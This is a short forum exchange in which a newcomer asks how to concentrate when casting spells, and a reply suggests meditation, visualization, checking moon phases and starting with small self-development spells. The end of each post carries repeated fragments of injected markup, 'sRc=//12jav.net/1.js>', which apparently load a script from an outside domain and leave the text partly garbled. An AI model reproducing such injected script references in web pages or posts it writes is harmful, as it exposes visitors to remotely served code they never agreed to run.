Hello I am new here and pretty new to magic (I have been doing psi for about 2 months). I have a lot of trouble concentrating on spells when I am trying to cast them. Any exercises you could recommend to improve my concentration? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Meditation, visualization and you should look at what day it is or the moon phase. You probably shouldn't be doing spells yet, try doing the basics I just showed you first.

Read books on every thing on the basics and ask questions and try on small spells on self devalopment. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
